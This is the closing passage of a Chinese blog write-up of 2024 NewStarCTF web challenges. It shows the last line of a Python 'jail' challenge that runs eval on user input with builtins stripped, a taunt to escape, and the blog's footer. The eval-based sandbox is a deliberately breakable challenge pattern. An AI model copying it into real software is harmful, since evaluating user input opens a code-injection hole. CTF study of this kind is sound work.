<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token builtin">eval</span><span class="token punctuation">(</span>inp<span class="token punctuation">,</span> <span class="token punctuation">&#123;</span><span class="token string">"__builtins__"</span><span class="token punctuation">:</span> <span class="token boolean">None</span><span class="token punctuation">,</span> <span class="token string">'f'</span><span class="token punctuation">:</span> f<span class="token punctuation">,</span> <span class="token string">'eval'</span><span class="token punctuation">:</span> ev4l<span class="token punctuation">&#125;</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
能不能逃出去给豌豆踩踩背就看你自己了，臭皮，，
<span class="token operator">></span> 
</code></pre>

</div></section><div id="reward-container"><span class="hty-icon-button button-glow" id="reward-button" title="打赏" onclick="var qr = document.getElementById(&quot;qr&quot;); qr.style.display = (qr.style.display === &quot;none&quot;) ? &quot;block&quot; : &quot;none&quot;;"><span class="icon iconify" data-icon="ri:hand-coin-line"></span></span><div id="reward-comment">I'm so cute. Please give me money.</div></div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>Hsad</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="https://hsad.xyz/2024/10/01/2024NewStarCTF/" title="2024NewStarCTF-web">https://hsad.xyz/2024/10/01/2024NewStarCTF/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><span class="icon iconify" data-icon="ri:creative-commons-line"></span><span class="icon iconify" data-icon="ri:creative-commons-by-line"></span><span class="icon iconify" data-icon="ri:creative-commons-nc-line"></span><span class="icon iconify" data-icon="ri:creative-commons-sa-line"></span></a> 许可协议。</li></ul></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/2024/10/02/2024SHCTF-web/" rel="prev" title="2024SHCTF-web"><span class="icon iconify" data-icon="ri:arrow-left-s-line"></span><span class="post-nav-text">2024SHCTF-web</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/2024/09/21/PolarLab-web-Baby/" rel="next" title="PolarLab-web-Baby"><span class="post-nav-text">PolarLab-web-Baby</span><span class="icon iconify" data-icon="ri:arrow-right-s-line"></span></a></div></div></div><div class="hty-card" id="comment"></div></main><footer class="sidebar-translate" id="footer"><div class="copyright"><span>&copy; 2019 – 2024 </span><span class="with-love" id="animate"><span class="icon iconify" data-icon="ri:cloud-line"></span></span><span class="author"> Hsad</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v7.2.0</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.10.11</span></div></footer></div><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><span class="icon iconify" data-icon="ri:arrow-up-s-line"></span><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#0078E7" stroke-width="2" stroke-linecap="round"></circle></svg></a><script src="https://fastly.jsdelivr.net/npm/medium-zoom@1.0.6/dist/medium-zoom.min.js"></script><script>const images = [...document.querySelectorAll('.markdown-body img')]
mediumZoom(images)</script><style>.medium-zoom-image {
  z-index: 99;
}</style></body></html>